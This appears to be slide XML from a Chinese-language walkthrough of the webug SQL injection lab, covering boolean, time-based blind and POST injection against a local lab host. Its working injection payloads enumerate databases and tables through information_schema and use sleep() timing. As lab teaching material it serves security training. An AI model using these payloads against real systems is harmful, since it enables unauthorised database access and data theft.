                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>bool_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>=1‘ and  left(database(),1) &gt; ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>saaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>’--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>请大家留意这个也是正确的，所以大家尽量使用一个字符来判断。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>4.   http://192.168.80.136/control/sqlinject/bool_injection.php?id=1‘ and  left((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> limit 0,1),1)&gt;’a’--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>这种使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>的方法可以遍历所得数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>5.  http://192.168.80.136/control/sqlinject/bool_injection.php?id=1‘ and  left((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>webug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>‘ limit 0,1),1)&gt;’a’--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>遍历里面的所有表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>剩下的就是遍历列名字，然后和字段的值，这个过程较为麻烦，可以使用脚本或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sqlimap</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3544450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36BD6-822B-46F0-B4C6-EFDDECEDF17B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="565444"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-03_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>延时注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1962A364-FF6B-4E50-86B3-1BC1C839C805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180109" y="1330036"/>
            <a:ext cx="11817927" cy="5292437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>bool_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1‘ --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发现修改之后没有错误，找到注入点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>bool_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1‘ and 1=1 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>再次验证我们找到注入点是正确的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.  http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>bool_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1‘ and if((length(database())&gt;1),1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和第二关相同的方法，判断此时的值，在使用大于和小于号的时候，适合手工判断，可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>配合等号进行快速长度判断。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. http://192.168.80.136/control/sqlinject/bool_injection.php?id=1‘ and if(((select length(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> limit 0,1)&gt;1),1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也可通过这种方法进行一个一个数据库长度的判断，不过较慢。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其余方法和第二关相同。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2351184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4A9EB-CBB5-48A0-BB85-F1FC33C42E09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="303747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-04_ post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_01</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A782634D-0432-4443-82D4-24025F521E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193964" y="886691"/>
            <a:ext cx="11804071" cy="5805054"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>点击注册</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>登录界面没有反应，看到存在一个搜索界面，我们直接输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，此时产生报错信息：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Invalid query: SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlinjection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> WHERE content = ‘‘’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即表示此界面存在注入漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http—leader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具抓到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据，也可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>抓取数据：存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，此时我们可以开始构造。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hackbar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中构造：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=‘#(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这里不能使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是错误的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union select1,2# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发现在页面中并未发现回显数据，这里我们使用盲注。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=‘ and  length(database())=1# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用盲注之后，发现页面没有发生变化，我们改为时间盲注。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fadsfadfdasfasdfasfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘ and  1=2#   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fadsfadfdasfasdfasfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ or 1=2#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回均正常，说明了这里不能使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句。 理论上来说使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的第一个语句是错误的，但是页面返回还是正常，说明做了处理，我们继续尝试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sleep()   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>fadsfadfdasfasdfasfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>‘ or sleep(3)# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>存在延迟，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>fadsfadfdasfasdfasfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>’ and  sleep(3)#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>没有延迟，接下来我们使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>来处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>注意这里是一个坑！！！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3895755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4A9EB-CBB5-48A0-BB85-F1FC33C42E09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
